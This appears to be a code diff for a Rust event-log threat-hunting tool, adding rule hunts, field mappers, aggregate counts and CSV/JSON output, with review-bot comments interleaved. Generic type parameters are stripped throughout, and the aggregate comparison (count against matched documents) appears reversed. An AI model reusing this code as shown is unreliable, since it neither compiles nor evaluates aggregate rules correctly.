+ let mut hids = HashSet::new(); + for (hid, _) in &ids { + hids.insert(hid); + } + let wrapper = match &document.kind { + FileKind::Evtx => crate::evtx::Wrapper(&document.data), _ => continue, }; - if let Some(default) = group.default.as_ref() { - for field in default { - if let Some(value) = group - .fields - .get(field) - .and_then(|k| document.data.find(k)) - .and_then(|v| v.to_string()) - { - cells.push(cell!(format_field_length(&value, full, column_width))); - } else { - cells.push(cell!("")); + let mut hdrs = HashMap::new(); + for hid in hids { + let hunt = hunts.get(hid).expect("could not get hunt"); + let fields = match &hunt.kind { + crate::hunt::HuntKind::Group { .. } => { + &groups.get(&hunt.id).expect("could not get group").fields + } + crate::hunt::HuntKind::Rule { .. } => { + &rules.get(&hunt.id).expect("could not get rule").fields } + }; + let flds: HashMap<_, _> = + fields.iter().map(|f| (&f.name, &f.from)).collect(); + for header in &headers { + if let Some(from) = flds.get(header) { + let mapper = Mapper(&hunt.mapper, &wrapper); + if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + { + hdrs.insert( + header, + format_field_length(&value, full, column_width), + ); + } + } + } + } + for header in &headers { + if let Some(value) = hdrs.get(header) { + cells.push(cell!(value)); + } else { + cells.push(cell!("")); } - } else { - let json = serde_json::to_string(&document.data) - .expect("could not serialise document"); - cells.push(cell!(format_field_length(&json, false, column_width))); } - table.add_row(Row::new(cells)); } + table.add_row(Row::new(cells)); } } - cs_greenln!("\n[+] Group: {}", key.1); + cs_greenln!("\n[+] Group: {}", key); cs_print_table!(table); } } pub fn print_csv( detections: &[Detections], + hunts: &[Hunt], mappings: &[Mapping], + rules: &HashMap>, local: bool, timezone: Option, ) -> crate::Result<()> { 
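Review bot: For `Kind::Aggregate { documents }` the row is built from `documents.first()` only, so an aggregate detection (such as the `count: '>5'` brute-force rule added in this commit) prints as one ordinary row with the first failure's fields and no indication of how many documents it aggregates; at minimum the detections cell should carry the count, e.g. `format!("{} {} (x{})", RULE_PREFIX, name, documents.len())`, or the row should say it is an aggregate. The `_ => continue` in the `document.kind` match silently drops the whole row for a non-Evtx document after the timestamp and detections cells were already computed; since `FileKind::Evtx` is the only variant matched, a later file kind would vanish from the table without any message, so pushing empty cells (or logging) would be safer than `continue`. The comment about header clashes is honest, but note that `hdrs.insert(header, …)` makes the last hunt iterated win, and `hids` is a `HashSet` so that choice is non-deterministic between runs; iterating `ids` in order instead of collecting into a set would at least make it stable. The enclosing `print_detections` started before this hunk.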
@@ -231,23 +290,37 @@ pub fn print_csv( .expect("could not get output directory") }; fs::create_dir_all(directory)?; - let mappings: HashMap<_, HashMap<_, _>> = mappings - .iter() - .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) - .collect(); + // Build headers + let mut headers: HashMap<&String, (Vec<&String>, HashSet<&String>)> = HashMap::new(); + for hunt in hunts { + let headers = headers + .entry(&hunt.group) + .or_insert((vec![], HashSet::new())); + for header in &hunt.headers { + if !headers.1.contains(&header) { + (*headers).0.push(&header); + (*headers).1.insert(&header); + } + } + } + // Build lookups + let mut groups: HashMap<&Uuid, &Group> = HashMap::new(); + for mapping in mappings { + for group in &mapping.groups { + groups.insert(&group.id, group); + } + } + let hunts: HashMap<_, _> = hunts.iter().map(|h| (&h.id, h)).collect(); + let rules: HashMap<_, _> = rules.values().flatten().map(|r| (&r.0, &r.1)).collect(); // Do a single unfold... - let mut grouped: HashMap< - (&Option, &String), - Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, - > = HashMap::new(); + let mut grouped: HashMap<&String, Vec<(&NaiveDateTime, &Kind, Vec<(&Uuid, &Uuid)>)>> = + HashMap::new(); for detection in detections { - let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = - HashMap::new(); + let mut tags: HashMap<&String, (&NaiveDateTime, Vec<(&Uuid, &Uuid)>)> = HashMap::new(); for hit in &detection.hits { - let tags = tags - .entry((&hit.mapping, &hit.group)) - .or_insert((&hit.timestamp, vec![])); - (*tags).1.push(&hit.tag); + let group = &hunts.get(&hit.hunt).expect("could not get hunt").group; + let tags = tags.entry(&group).or_insert((&hit.timestamp, vec![])); + (*tags).1.push((&hit.hunt, &hit.rule)); } for (k, v) in tags { let grouped = grouped.entry(k).or_insert(vec![]); 
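Review bot: In the header-building loop the inner `let headers = headers.entry(&hunt.group)...` binding shadows the outer `headers` map for the rest of the loop body and is then dereferenced explicitly as `(*headers).0.push(&header)`, which makes the two-level structure hard to follow. A distinct name such as `let entry = headers.entry(&hunt.group).or_insert((vec![], HashSet::new()));` removes the shadowing and the explicit deref, and the `contains`/`push`/`insert` trio collapses to `if entry.1.insert(header) { entry.0.push(header); }` because `HashSet::insert` already reports whether the value was new. The same shadowing pattern (`let tags = tags.entry(...)`, `let grouped = grouped.entry(...)`) recurs at the bottom of this hunk and would benefit from the same renaming.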
@@ -260,91 +333,141 @@ pub fn print_csv( let mut grouped = grouped.remove(&key).expect("could not get grouped!"); grouped.sort_by(|x, y| x.0.cmp(&y.0)); // FIXME: Handle name clashes - let filename = format!("{}.csv", key.1.replace(" ", "_").to_lowercase()); + let filename = format!("{}.csv", key.replace(" ", "_").to_lowercase()); let path = directory.join(&filename); let mut csv = prettytable::csv::Writer::from_path(path)?; cs_eprintln!("[+] Created {}", filename); - let (mapping, group) = key; - if let Some(mapping) = mapping { - if let Some(groups) = mappings.get(mapping) { - let group = groups.get(&group).expect("could not get group!"); - let mut header = vec!["timestamp", "detections"]; - if let Some(default) = group.default.as_ref() { - for field in default { - header.push(field); + if let Some((headers, _)) = headers.remove(key) { + let mut cells = vec!["timestamp", "detections"]; + if headers.is_empty() { + cells.push("data"); + } else { + for header in &headers { + cells.push(header); + } + } + csv.write_record(cells)?; + for (timestamp, kind, ids) in grouped { + // FIXME: Sort tags + //tags.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![localised]; + cells.push( + ids.iter() + .map(|(_, rid)| { + format!( + "{}", + rules.get(rid).expect("could not get rule").name.as_str() + ) + }) + .collect::>() + .join(";"), + ); + let document = match kind { + Kind::Individual { document } => document, + Kind::Aggregate { documents } => { + documents.first().expect("could not get document") } + }; + if headers.is_empty() { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + 
cells.push(json); } else { - header.push("data"); - } - csv.write_record(header)?; - for (timestamp, kind, mut tags) in grouped { - tags.sort(); - let localised = if let Some(timezone) = timezone { - timezone - .from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else if local { - Utc.from_local_datetime(timestamp) - .single() - .expect("failed to localise timestamp") - .to_rfc3339() - } else { - DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() - }; - let mut cells = vec![localised]; - cells.push( - tags.iter() - .map(|tag| format!("{}", tag.as_str())) - .collect::>() - .join(";"), - ); - let document = match kind { - Kind::Individual { document } => document, + // This is really complicated, we could land in the same group but be from + // different hunts that have different headers, that also could even overlap... + // Because we group we won't be able to reliably handle clashes. + let mut hids = HashSet::new(); + for (hid, _) in &ids { + hids.insert(hid); + } + let wrapper = match &document.kind { + FileKind::Evtx => crate::evtx::Wrapper(&document.data), _ => continue, }; - if let Some(default) = group.default.as_ref() { - for field in default { - if let Some(value) = group - .fields - .get(field) - .and_then(|k| document.data.find(k)) - .and_then(|v| v.to_string()) - { - cells.push(value); - } else { - cells.push("".to_owned()); + let mut hdrs = HashMap::new(); + for hid in hids { + let hunt = hunts.get(hid).expect("could not get hunt"); + let fields = match &hunt.kind { + crate::hunt::HuntKind::Group { .. } => { + &groups.get(&hunt.id).expect("could not get group").fields + } + crate::hunt::HuntKind::Rule { .. 
} => { + &rules.get(&hunt.id).expect("could not get rule").fields } + }; + let flds: HashMap<_, _> = + fields.iter().map(|f| (&f.name, &f.from)).collect(); + for header in &headers { + if let Some(from) = flds.get(header) { + let mapper = Mapper(&hunt.mapper, &wrapper); + if let Some(value) = mapper.find(&from).and_then(|v| v.to_string()) + { + hdrs.insert(header, value); + } + } + } + } + for header in &headers { + if let Some(value) = hdrs.get(header) { + cells.push(value.to_string()); + } else { + cells.push("".to_owned()); } - } else { - let json = serde_json::to_string(&document.data) - .expect("could not serialise document"); - cells.push(json); } - csv.write_record(cells)?; } + csv.write_record(cells)?; } } } Ok(()) } +#[derive(Debug, Serialize)] +pub struct Detection<'a> { + pub group: &'a String, + #[serde(flatten)] + pub kind: &'a Kind, + pub name: &'a String, + pub timestamp: String, + + pub authors: &'a Vec, + pub level: &'a Level, + pub source: &'a RuleKind, + pub status: &'a Status, +} + pub fn print_json( detections: &[Detections], - rules: &[Rule], + rules: &HashMap>, local: bool, timezone: Option, ) -> crate::Result<()> { - // TODO: Fixme... - let ruleset = "sigma".to_owned(); - let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + let mut rs: HashMap<_, _> = HashMap::new(); + for (kind, rules) in rules { + for (id, rule) in rules { + rs.insert(id, (kind, rule)); + } + } let mut detections = detections .iter() .map(|d| { let mut detections = Vec::with_capacity(d.hits.len()); for hit in &d.hits { - let rule = rules.get(&hit.tag).expect("could not get rule!"); + let (kind, rule) = rs.get(&hit.rule).expect("could not get rule!"); let localised = if let Some(timezone) = timezone { timezone .from_local_datetime(&hit.timestamp) 
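Review bot: The per-group CSV filename near the top of this hunk is built straight from the group name, `format!("{}.csv", key.replace(" ", "_").to_lowercase())`, and joined onto the output directory, so a group name taken from a rule or mapping file that contains path separators or `..` resolves to a path outside that directory, and an empty name yields `.csv`. Since rule sets are commonly third-party, restrict the name to a safe character set before using it as a filename, e.g. `let stem: String = key.chars().map(|c| if c.is_ascii_alphanumeric() { c.to_ascii_lowercase() } else { '_' }).collect();` followed by `let filename = format!("{}.csv", stem);`. That mapping makes the existing `// FIXME: Handle name clashes` more pressing, so a numeric suffix on collision would be worth adding at the same time. The `group: "".to_owned()` assigned to Sigma-derived rules later in this patch suggests the empty-name case is reachable, though how `group` flows into `key` for those rules is only partly visible here.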
@@ -361,11 +484,11 @@ pub fn print_json( }; detections.push(Detection { authors: &rule.authors, - group: &hit.group, + group: &rule.group, kind: &d.kind, level: &rule.level, - name: &hit.tag, - source: &ruleset, + name: &rule.name, + source: kind, status: &rule.status, timestamp: localised, }) diff --git a/src/ext/tau.rs b/src/ext/tau.rs index 84c6cf88..fe5fd429 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -1,5 +1,37 @@ use aho_corasick::AhoCorasickBuilder; -use tau_engine::core::parser::{BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search}; +use serde::de; +use serde_yaml::Value as Yaml; +use tau_engine::core::parser::{ + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search, +}; + +pub fn deserialize_expression<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; + parse_identifier(&yaml).map_err(de::Error::custom) +} + +pub fn deserialize_numeric<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let string: String = de::Deserialize::deserialize(deserializer)?; + if let Ok(i) = str::parse::(&string) { + return Ok(Pattern::Equal(i)); + } + let identifier = string.into_identifier().map_err(de::Error::custom)?; + match &identifier.pattern { + &Pattern::Equal(_) + | &Pattern::GreaterThan(_) + | &Pattern::GreaterThanOrEqual(_) + | &Pattern::LessThan(_) + | &Pattern::LessThanOrEqual(_) => {} + _ => return Err(de::Error::custom("only numeric expressions are allowed")), + } + Ok(identifier.pattern) +} pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 6666ab89..9e6b88dd 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs @@ -1,4 +1,3 @@ -use std::collections::{HashMap, HashSet}; use std::fs::File; use std::path::Path; 
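Review bot: `deserialize_numeric` and `deserialize_expression` define the accepted syntax of the `count` and `filter` rule keys but carry no doc comments, so a rule author has to reverse-engineer the format from the `Pattern` match. On `deserialize_numeric` a comment such as `/// Deserialises an aggregate count: a bare integer means equality; otherwise the string is parsed as a tau identifier and only =, >, >=, <, <= comparisons are accepted.` would do, and a one-liner on `deserialize_expression` stating that it parses a YAML value into a tau `Expression`. The type argument of `str::parse::<...>` appears to have been lost in rendering here, so I cannot confirm which integer width is accepted; the doc comment should state it.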
@@ -7,8 +6,6 @@ use regex::RegexSet; use serde_json::Value as Json; use tau_engine::{Document, Value as Tau}; -use crate::hunt::{Group, Huntable}; -use crate::rule::Rule; use crate::search::Searchable; pub type Evtx = SerializedEvtxRecord; @@ -33,13 +30,6 @@ impl Parser { } } -pub struct Mapper<'a>(&'a HashMap, &'a Wrapper<'a>); -impl<'a> Document for Mapper<'a> { - fn find(&self, key: &str) -> Option> { - self.0.get(key).and_then(|v| self.1.find(v)) - } -} - pub struct Wrapper<'a>(pub &'a Json); impl<'a> Document for Wrapper<'a> { fn find(&self, key: &str) -> Option> { @@ -62,30 +52,6 @@ impl<'a> Document for Wrapper<'a> { } } -impl Huntable for &SerializedEvtxRecord { - fn hits( - &self, - rules: &[Rule], - exclusions: &HashSet, - group: &Group, - ) -> Option> { - let wrapper = Wrapper(&self.data); - if tau_engine::core::solve(&group.filter, &wrapper) { - let mut tags = vec![]; - for rule in rules { - if exclusions.contains(&rule.tag) { - continue; - } - if rule.tau.matches(&Mapper(&group.fields, &wrapper)) { - tags.push(rule.tag.clone()); - } - } - return Some(tags); - } - None - } -} - impl Searchable for SerializedEvtxRecord { fn matches(&self, regex: &RegexSet) -> bool { regex.is_match(&self.data.to_string()) diff --git a/src/file/mod.rs b/src/file/mod.rs index 21e35fac..7096ef36 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -1,10 +1,13 @@ use std::fs; use std::path::{Path, PathBuf}; +use serde::{Deserialize, Serialize}; + use self::evtx::{Evtx, Parser as EvtxParser}; pub mod evtx; +#[derive(Clone)] pub enum Document { Evtx(Evtx), } @@ -13,6 +16,13 @@ pub struct Documents<'a> { iterator: Box> + 'a>, } +#[derive(Clone, Debug, PartialEq, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Kind { + Evtx, + Unknown, +} + impl<'a> Iterator for Documents<'a> { type Item = crate::Result; 
@@ -103,6 +113,13 @@ impl Reader { }; Documents { iterator } } + + pub fn kind(&self) -> Kind { + match self.parser { + Parser::Evtx(_) => Kind::Evtx, + Parser::Unknown => Kind::Unknown, + } + } } pub fn get_files( diff --git a/src/hunt.rs b/src/hunt.rs index 28f5da7e..6f323d3d 100644 --- a/src/hunt.rs +++ b/src/hunt.rs 
@@ -1,54 +1,49 @@ -use std::collections::{HashMap, HashSet}; -use std::fs::File; +use std::collections::{hash_map::DefaultHasher, HashMap, HashSet}; +use std::fs; +use std::hash::{Hash, Hasher}; use std::io::Read; use std::path::{Path, PathBuf}; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; -use serde::{de, Deserialize, Serialize}; +use serde::{Deserialize, Serialize}; use serde_json::Value as Json; -use serde_yaml::Value as Yaml; use tau_engine::{ - core::parser::{parse_identifier, Expression}, - Document as Docu, + core::parser::{Expression, Pattern}, + Document as TauDocument, Value as Tau, }; +use uuid::Uuid; -use crate::file::{Document as Doc, Reader}; -use crate::rule::{Kind as RuleKind, Rule}; +use crate::file::{Document as File, Kind as FileKind, Reader}; +use crate::rule::{ + chainsaw::{Aggregate, Field, Filter, Rule as Chainsaw}, + Kind as RuleKind, Rule, +}; -#[derive(Deserialize)] +#[derive(Clone, Deserialize)] pub struct Group { - #[serde(default)] - pub default: Option>, - pub fields: HashMap, - #[serde(deserialize_with = "deserialize_expression")] + #[serde(skip, default = "Uuid::new_v4")] + pub id: Uuid, + pub fields: Vec, + #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] pub filter: Expression, pub name: String, pub timestamp: String, } -fn deserialize_expression<'de, D>(deserializer: D) -> Result -where - D: de::Deserializer<'de>, -{ - let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; - parse_identifier(&yaml).map_err(de::Error::custom) -} - #[derive(Deserialize)] pub struct Mapping { #[serde(default)] pub exclusions: HashSet, pub groups: Vec, - pub kind: String, + pub kind: FileKind, pub name: String, pub rules: RuleKind, } pub struct Hit { - pub group: String, - pub mapping: Option, - pub tag: String, + pub hunt: Uuid, + pub rule: Uuid, pub timestamp: NaiveDateTime, } 
@@ -57,22 +52,9 @@ pub struct Detections { pub kind: Kind, } -#[derive(Debug, Serialize)] -pub struct Detection<'a> { - pub authors: &'a Vec, - pub group: &'a String, - #[serde(flatten)] - pub kind: &'a Kind, - pub level: &'a String, - pub name: &'a String, - pub source: &'a String, - pub status: &'a String, - pub timestamp: String, -} - #[derive(Debug, Serialize)] pub struct Document { - pub kind: String, + pub kind: FileKind, pub data: Json, } @@ -83,15 +65,6 @@ pub enum Kind { Individual { document: Document }, } -pub trait Huntable { - fn hits( - &self, - rules: &[Rule], - exclusions: &HashSet, - group: &Group, - ) -> Option>; -} - #[derive(Default)] pub struct HunterBuilder { mappings: Option>, 
@@ -111,23 +84,83 @@ impl HunterBuilder { } pub fn build(self) -> crate::Result { + let mut hunts = vec![]; + let rules = match self.rules { + Some(mut rules) => { + rules.sort_by(|x, y| x.chainsaw.name.cmp(&y.chainsaw.name)); + let mut map = HashMap::new(); + for rule in rules { + let uuid = Uuid::new_v4(); + let rules = map.entry(rule.kind.clone()).or_insert(vec![]); + if &rule.kind == &RuleKind::Chainsaw { + let mapper = MapperKind::from(&rule.chainsaw.fields); + hunts.push(Hunt { + id: uuid.clone(), + + group: rule.chainsaw.group.clone(), + headers: rule + .chainsaw + .fields + .iter() + .filter_map(|f| if f.visible { Some(&f.name) } else { None }) + .cloned() + .collect(), + kind: HuntKind::Rule { + aggregate: rule.chainsaw.aggregate.clone(), + filter: rule.chainsaw.filter.clone(), + }, + timestamp: rule.chainsaw.timestamp.clone(), + + file: rule.chainsaw.kind.clone(), + mapper, + rule: rule.kind, + }); + } + (*rules).push((uuid, rule.chainsaw)); + } + map + } + None => HashMap::new(), + }; let mappings = match self.mappings { - Some(mappings) => { + Some(mut mappings) => { + mappings.sort(); let mut scratch = vec![]; for mapping in mappings { - let mut file = File::open(mapping)?; + let mut file = fs::File::open(mapping)?; let mut content = String::new(); file.read_to_string(&mut content)?; - scratch.push(serde_yaml::from_str(&mut content)?); + let mut mapping: Mapping = serde_yaml::from_str(&mut content)?; + mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); + for group in &mapping.groups { + let mapper = MapperKind::from(&group.fields); + hunts.push(Hunt { + id: group.id.clone(), + + group: group.name.clone(), + headers: group + .fields + .iter() + .filter_map(|f| if f.visible { Some(&f.name) } else { None }) + .cloned() + .collect(), + kind: HuntKind::Group { + exclusions: mapping.exclusions.clone(), + filter: group.filter.clone(), + }, + timestamp: group.timestamp.clone(), + + file: mapping.kind.clone(), + mapper, + rule: mapping.rules.clone(), + }); + } 
+ scratch.push(mapping); } scratch } None => vec![], }; - let rules = match self.rules { - Some(rules) => rules, - None => vec![], - }; let load_unknown = self.load_unknown.unwrap_or_default(); let local = self.local.unwrap_or_default(); @@ -135,6 +168,7 @@ impl HunterBuilder { Ok(Hunter { inner: HunterInner { + hunts, mappings, rules, @@ -189,9 +223,70 @@ impl HunterBuilder { } } +pub enum HuntKind { + Group { + exclusions: HashSet, + filter: Expression, + }, + Rule { + aggregate: Option, + filter: Filter, + }, +} + +pub enum MapperKind { + None, + Fast(HashMap), + Full(HashMap), +} + +impl MapperKind { + pub fn from(fields: &Vec) -> Self { + let mut fast = false; + let mut full = false; + for field in fields { + if field.container.is_some() { + full = true; + break; + } + if field.from != field.to { + fast = true; + } + } + if full { + let mut map = HashMap::with_capacity(fields.len()); + for field in fields { + map.insert(field.from.clone(), field.clone()); + } + MapperKind::Full(map) + } else if fast { + let mut map = HashMap::with_capacity(fields.len()); + for field in fields { + map.insert(field.from.clone(), field.to.clone()); + } + MapperKind::Fast(map) + } else { + MapperKind::None + } + } +} + +pub struct Hunt { + pub id: Uuid, + pub group: String, + pub headers: Vec, + pub kind: HuntKind, + pub timestamp: String, + + pub file: FileKind, + pub mapper: MapperKind, + pub rule: RuleKind, +} + pub struct HunterInner { + hunts: Vec, mappings: Vec, - rules: Vec, + rules: HashMap>, load_unknown: bool, local: bool, 
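Review bot: The two `hunts.push(Hunt { ... })` literals in `build` (one per Chainsaw rule, one per mapping group) repeat the same ten-line construction, including the `visible`-filtered `headers` and the `MapperKind::from` call; a small constructor that takes the id, group, fields, kind, timestamp, file kind and rule kind and derives `headers` and `mapper` from `fields` would keep the two call sites from drifting apart. Minor: `serde_yaml::from_str(&mut content)` only needs `&content`. Non-Chainsaw rules are stored in `map` under their kind but get no `Hunt` of their own, so they only run when some mapping declares `rules:` of that kind; that is presumably intended, but a warning when a loaded rule kind is referenced by no mapping would save users from silently inert rule sets.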
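Review bot: `MapperKind`, `HuntKind` and `Hunt` are undocumented and the variant names `None`/`Fast`/`Full` do not explain why `MapperKind::from` short-circuits on `container.is_some()`; a comment on the enum along the lines of `/// None: field names are used as-is; Fast: plain rename from `from` to `to`; Full: at least one field needs container extraction (see Field::container)` would make the constructor readable. Style: an inherent method named `from` reads like the `From` trait; either `impl From<&[Field]> for MapperKind` or a name such as `for_fields(fields: &[Field])` avoids the confusion, and `&[Field]` is the idiomatic parameter type over `&Vec<Field>`.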
@@ -201,6 +296,22 @@ pub struct HunterInner { to: Option>, } +//pub struct Mapper<'a>(&'a HashMap, &'a dyn TauDocument); +pub struct Mapper<'a>(pub &'a MapperKind, pub &'a dyn TauDocument); +impl<'a> TauDocument for Mapper<'a> { + fn find(&self, key: &str) -> Option> { + match &self.0 { + MapperKind::None => self.1.find(key), + MapperKind::Fast(map) => match map.get(key) { + Some(v) => self.1.find(v), + None => self.1.find(key), + }, + //MapperKind::Full(map) => unimplemented!(), + MapperKind::Full(map) => self.1.find(key), + } + } +} + pub struct Hunter { inner: HunterInner, } @@ -212,8 +323,13 @@ impl Hunter { pub fn hunt(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + let kind = reader.kind(); + // This can be optimised better ;) let mut detections = vec![]; + let mut aggregates: HashMap>)> = HashMap::new(); + let mut files: HashMap = HashMap::new(); for document in reader.documents() { + let document_id = Uuid::new_v4(); let document = match document { Ok(document) => document, Err(e) => { 
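Review bot: The `MapperKind::Full(map)` arm of `Mapper::find` ignores `map` entirely and falls through to `self.1.find(key)`, so any field set that includes a `container` silently behaves like `MapperKind::None`: not even the `from`/`to` rename is applied, and the commented-out `unimplemented!()` above it shows this was noticed. Until container extraction exists, the arm should at least honour the rename so that Full and Fast agree on the fields they share, with the gap recorded explicitly; alternatively `HunterBuilder::build` could reject fields with `container` set. The commented-out lines (`//pub struct Mapper<'a>...`, `//MapperKind::Full(map) => unimplemented!()`) should be deleted rather than left as dead code.
```rust
MapperKind::Full(map) => match map.get(key) {
    // TODO: container extraction (Field::container) is not applied yet;
    // only the from -> to rename is honoured here.
    Some(field) => self.1.find(&field.to),
    None => self.1.find(key),
},
```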
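Review bot: `let document_id = Uuid::new_v4();` at the top of the per-document loop draws a random UUID for every record read, but the id is only consumed in the aggregate branch further down (`files.insert` / `docs.push`), so the RNG call sits on the common path for nothing. Generating it lazily on first use, e.g. an `Option<Uuid>` filled inside the aggregate branch, keeps one id per document (so several aggregating hunts still share a single `files` entry) while skipping the cost for documents that never aggregate. The body of `hunt` continues in the next hunk.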
@@ -223,134 +339,225 @@ impl Hunter { return Err(e); } }; - - // The logic is as follows, all rules except chainsaw ones need a mapping. - - // TODO: Handle chainsaw rules... - - for mapping in &self.inner.mappings { - if mapping.kind != "evtx" { + let wrapper = match &document { + File::Evtx(evtx) => crate::evtx::Wrapper(&evtx.data), + }; + let mut hits = vec![]; + for hunt in &self.inner.hunts { + if hunt.file != kind { continue; } - let mut hits = vec![]; - for group in &mapping.groups { - // TODO: Default to RFC 3339 - let timestamp = match &document { - Doc::Evtx(evtx) => { - match crate::evtx::Wrapper(&evtx.data).find(&group.timestamp) { - Some(value) => match value.as_str() { - Some(timestamp) => match NaiveDateTime::parse_from_str( - timestamp, - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(e) => { - if self.inner.skip_errors { - cs_eyellowln!( - "failed to parse timestamp '{}' - {}", - timestamp, - e, - ); - continue; - } else { - anyhow::bail!( - "failed to parse timestamp '{}' - {}", - timestamp, - e - ); - } - } - }, - None => continue, - }, - None => continue, - } - } - }; - - if self.inner.from.is_some() || self.inner.to.is_some() { - // TODO: Not sure if this is correct... 
- let localised = if let Some(timezone) = self.inner.timezone { - let local = match timezone.from_local_datetime(×tamp).single() { - Some(l) => l, - None => { + let mapper = Mapper(&hunt.mapper, &wrapper); + + let timestamp = match mapper.find(&hunt.timestamp) { + Some(value) => match value.as_str() { + Some(timestamp) => { + match NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") + { + Ok(t) => t, + Err(e) => { if self.inner.skip_errors { - cs_eyellowln!("failed to localise timestamp"); + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); continue; } else { - anyhow::bail!("failed to localise timestamp"); + anyhow::bail!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ); } } - }; - local.with_timezone(&Utc) - } else if self.inner.local { - match Utc.from_local_datetime(×tamp).single() { - Some(l) => l, - None => { - if self.inner.skip_errors { - cs_eyellowln!("failed to localise timestamp"); + } + } + None => continue, + }, + None => continue, + }; + + if self.skip(timestamp)? 
{ + continue; + } + + match &hunt.kind { + HuntKind::Group { exclusions, filter } => { + if let Some(rules) = self.inner.rules.get(&hunt.rule) { + if tau_engine::core::solve(&filter, &mapper) { + for (rid, rule) in rules { + if exclusions.contains(&rule.name) { continue; - } else { - anyhow::bail!("failed to localise timestamp"); + } + let hit = match &rule.filter { + Filter::Detection(detection) => { + tau_engine::solve(&detection, &mapper) + } + Filter::Expression(expression) => { + tau_engine::core::solve(&expression, &mapper) + } + }; + if hit { + hits.push(Hit { + hunt: hunt.id.clone(), + rule: rid.clone(), + timestamp, + }); } } } - } else { - DateTime::::from_utc(timestamp, Utc) - }; - // Check if event is older than start date marker - if let Some(sd) = self.inner.from { - if localised <= sd { - continue; - } - } - // Check if event is newer than end date marker - if let Some(ed) = self.inner.to { - if localised >= ed { - continue; - } } } - if let Some(tags) = match &document { - Doc::Evtx(evtx) => evtx.hits(&self.inner.rules, &mapping.exclusions, group), - } { - for tag in tags { - hits.push(Hit { - tag, - group: group.name.clone(), - mapping: Some(mapping.name.clone()), - timestamp, - }); + HuntKind::Rule { aggregate, filter } => { + let hit = match &filter { + Filter::Detection(detection) => tau_engine::solve(&detection, &mapper), + Filter::Expression(expression) => { + tau_engine::core::solve(&expression, &mapper) + } + }; + if hit { + if let Some(aggregate) = aggregate { + files.insert(document_id.clone(), (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + for field in &aggregate.fields { + if let Some(value) = + mapper.find(&field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } + } + let id = hasher.finish(); + let aggregates = aggregates + .entry(hunt.id) + .or_insert((&aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id.clone()); + } else { + 
hits.push(Hit { + hunt: hunt.id.clone(), + rule: hunt.id.clone(), + timestamp, + }); + } } } } - - if hits.is_empty() { - continue; - } + } + if !hits.is_empty() { let data = match &document { - Doc::Evtx(evtx) => evtx.data.clone(), + File::Evtx(evtx) => evtx.data.clone(), }; detections.push(Detections { hits, kind: Kind::Individual { document: Document { - kind: "evtx".to_owned(), + kind: kind.clone(), data, }, }, }); } } + for (id, (aggregate, docs)) in aggregates { + for ids in docs.values() { + let hit = match aggregate.count { + Pattern::Equal(i) => (i as usize) == ids.len(), + Pattern::GreaterThan(i) => (i as usize) > ids.len(), + Pattern::GreaterThanOrEqual(i) => (i as usize) >= ids.len(), + Pattern::LessThan(i) => (i as usize) < ids.len(), + Pattern::LessThanOrEqual(i) => (i as usize) <= ids.len(), + _ => false, + }; + if hit { + let mut documents = Vec::with_capacity(ids.len()); + let mut timestamps = Vec::with_capacity(ids.len()); + for id in ids { + let (document, timestamp) = files.get(&id).expect("could not get document"); + let data = match &document { + File::Evtx(evtx) => evtx.data.clone(), + }; + documents.push(Document { + kind: kind.clone(), + data, + }); + timestamps.push(timestamp.clone()); + } + timestamps.sort(); + detections.push(Detections { + hits: vec![Hit { + hunt: id.clone(), + rule: id.clone(), + timestamp: timestamps + .into_iter() + .next() + .expect("failed to get timestamp"), + }], + kind: Kind::Aggregate { documents }, + }); + } + } + } Ok(detections) } + pub fn hunts(&self) -> &Vec { + &self.inner.hunts + } + pub fn mappings(&self) -> &Vec { &self.inner.mappings } - pub fn rules(&self) -> &Vec { + pub fn rules(&self) -> &HashMap> { &self.inner.rules } + + fn skip(&self, timestamp: NaiveDateTime) -> crate::Result { + if self.inner.from.is_some() || self.inner.to.is_some() { + // TODO: Not sure if this is correct... 
